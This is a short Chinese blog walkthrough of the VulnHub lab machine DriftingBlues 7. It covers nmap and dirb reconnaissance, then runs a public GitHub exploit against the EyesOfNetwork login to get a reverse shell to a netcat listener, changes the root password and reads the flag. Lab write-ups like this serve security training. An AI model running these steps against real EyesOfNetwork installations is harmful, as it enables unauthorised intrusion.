vulnhub实战——DRIFTINGBLUES: 7

vulnhub实战——Driftingblues7

前言

无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
可以直接用VM打开,ip会自动获取并显示出来(挺人性化的)
vulnhub实战——DRIFTINGBLUES: 7_第1张图片

正文

通过nmap扫描靶机nmap -sV -O 192.168.171.134vulnhub实战——DRIFTINGBLUES: 7_第2张图片
发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork
vulnhub实战——DRIFTINGBLUES: 7_第3张图片再目录爆破一下看看有没有其他东西

dirb https://192.168.171.134

vulnhub实战——DRIFTINGBLUES: 7_第4张图片
没什么有用的东西,连robots.txt都没有,再继续研究那个登录页面,百度搜索Eyes of network发现可以利用的exp

模块链接[https://github.com/h4knet/eonrce]

下载之后放入kali运行,需要先赋予运行权限

chmod +x eonrce.py

在这里插入图片描述
运行脚本./eonrce.py https://192.168.171.134 -ip 192.168.171.129 -port 8848
-ip 指定本机ip -port 指定nc监听的端口
vulnhub实战——DRIFTINGBLUES: 7_第5张图片渗透成功!!!!!!然后我们修改root的密码passwd root
由之前扫描发现开了ssh服务,我们用ssh连接靶机ssh 192.168.171.134vulnhub实战——DRIFTINGBLUES: 7_第6张图片
查看root用户目录下的文件,发现有个叫做flag.txt的文件,查看一下

vulnhub实战——DRIFTINGBLUES: 7_第7张图片
Congratulations!!!

你可能感兴趣的:(unctf,渗透测试,ssh,centos,linux)